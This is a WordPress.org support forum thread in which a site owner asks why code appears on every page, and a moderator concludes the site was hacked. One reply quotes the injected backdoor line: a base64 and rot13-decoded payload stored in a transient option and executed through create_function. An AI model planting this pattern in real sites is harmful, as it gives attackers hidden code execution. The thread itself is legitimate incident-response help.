WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Code at top of every page (11 posts)

  1. politicalrelief
    Member
    Posted 3 years ago #

    Forty lines or so of code are appearing at the top of every one of my pages. It's also appearing in my dashboard/settings, where all formatting and css is also removed. The site is http://politicalrelief.com

    I disabled all plugins, which didn't solve the problem. I can't point to any editing which may have caused the problem, as the last time I made any changes the site looked fine, and when I returned today, this strange code has appeared.

    Another user seemed to have a similar problem, and found some extraneous code in the header file, but if that's the problem here I don't know how to identify it.

    Any thoughts? Thanks!

  2. esmi
    Forum Moderator
    Posted 3 years ago #

    Have you tried:

    - switching to the default theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  3. politicalrelief
    Member
    Posted 3 years ago #

    I did try changing themes, but that didn't solve it.

    I did use ftp to move the plugins to another folder, created a new empty plugin folder. Didn't work either.

    Strangely, now I can't access my admin page at all anymore, it shows only the strange code and nothing else.

    Puzzling.

  4. sijo55
    Member
    Posted 3 years ago #

    There seems to be some code breaking the <?php tag:

    <
    ;$z=get_option("_transient_feed_947543a8084c67f0ea2db7eeed06677f"); $z=base64_decode(str_rot13($z)); if(strpos($z,"F6AFF7C3")!==false){ $_z=create_function("",$z); @$_z(); }
    ?php
    /**
     * Sets up the default filters and actions for most
     * of the WordPress hooks.

    You could search your files with grep to find this..

  5. esmi
    Forum Moderator
    Posted 3 years ago #

    Try re-uploading the wp-includes folder from a fresh download of your version of WordPress.

  6. politicalrelief
    Member
    Posted 3 years ago #

    Sijo55,

    If I found it, I wouldn't know which part of the code was wrong!

  7. politicalrelief
    Member
    Posted 3 years ago #

    Esmi,

    I used ftp to download the wp-includes folder, deleted same folder from the server, then re-uploaded it from my hard drive. Is that what you meant? Unfortunately it didn't change anything. And I'm still unable to access my admin panel.

  8. esmi
    Forum Moderator
    Posted 3 years ago #

    Is that what you meant?

    Was that from a fresh download of your version of WordPress from wordpress.org? Because those lines of code are from a file in the wp-includes folder which looks like it may have been damaged. A fresh upload should have rectified it.

  9. esmi
    Forum Moderator
    Posted 3 years ago #

    I've just had another look at the code that is being displayed (I only searched on the last two lines) and I'm pretty sure your site has been hacked. :-( Sorry - I should have picked that up sooner. Anything that includes base64_decode should be treated with the utmost suspicion. Have a look at these help resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

  10. politicalrelief
    Member
    Posted 3 years ago #

    Ugh, thanks for the heads up Esmi. I'm in the process of re-uploading my wp-includes folder, I didn't realize what you meant at first by a fresh upload.
    The first thing I tried to do to solve this problem was upgrade wordpress, but it wouldn't let me because my host doesn't yet have the right mysql version.
    I'll start working through the fixes on the pages you linked to.

  11. esmi
    Forum Moderator
    Posted 3 years ago #

    If I'm right and this is a hack, make sure that you read the last link I gave above. You don't want the hacker coming back in again via a backdoor.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.